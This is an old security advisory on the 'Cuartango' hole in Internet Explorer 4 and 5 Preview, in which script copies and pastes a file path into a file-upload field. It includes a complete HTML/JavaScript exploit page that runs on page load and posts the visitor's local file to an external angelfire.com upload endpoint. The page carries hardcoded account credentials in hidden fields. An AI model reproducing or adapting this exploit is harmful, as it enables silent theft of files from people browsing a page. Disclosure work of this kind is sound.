Cuartango security Hole 

http://pages.whowhere.com/computers/cuartangojc/cuartangoh1.html

Affected software
Microsoft Internet Explorer 4
Microsoft Internet Explorer 5 Preview

Risks
Major : Your computer files can be sent to a WEB site by a malicious Script (if the file name is known).

Technical description
                      There is an  input form field used to tranfer files from the browsing computer to a WEB site this
                      input field is HTML coded as :

                      <input type="file" name="filename" size="30">

                      Theoretically this input field can be filled only by the user by clicking a "Browse" button or
                      typing the file name.
                      In order to avoid a security hole, script files are not allowed to modify the value of this input  
                      field, the sentence bellow will not work (very clever MS Explorer programmers)  :

                      document.forms[0].filename = "C:\config.sys";

                      What Microsoft programmers forgot is that "copy" and "paste" commands are possible in scripting with
                      Internet Explorer 4 and they did not protect the file input field against  this operation.
                      Tha attack is the evident :
                      1- Create a second form with a hidden field named "T1" containing the file name you want to hack.
                      2- In the HTML Body Onload event fire an script :

                      <body onload="getfile()">

                      function getfile()
                      {
                      document.forms[1].T1.select();
                      document.execCommand("copy");
                      document.forms[0].filename.select();
                      document.execCommand("paste");
                      document.forms[0].submit();
                      }

                      The result is that the file is POSTED to the malicious WEB site defined in the form action property.


----------exploit code example----------

<html>
<script language="JavaScript">

function getfile()
{
document.forms[1].T1.select();
document.execCommand("copy");
document.forms[0].filename.select();
document.execCommand("paste");
window.open("cuartangoh3.html");
document.forms[0].submit();
}

</script>


<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<title>Cuartango Hole 2</title>
</head>

<body onload="getfile()">

<form enctype="multipart/form-data" method="post"
action="http://www.angelfire.com/cgi-bin/bedit">
  <input type="hidden" name="storage" value="ab"><input type="hidden" name="hpd"
  value="cuartangojc"><input type="hidden" name="password" value="asisea"><p><strong>I am
  transfering your file</strong> <input type="file" name="filename" size="30"> <strong>to my
  web site </strong>&nbsp; </p>
</form>

<form method="POST">
  <input type="hidden" name="T1" value="/test.txt"><p>&nbsp;</p>
</form>

</body>
</html>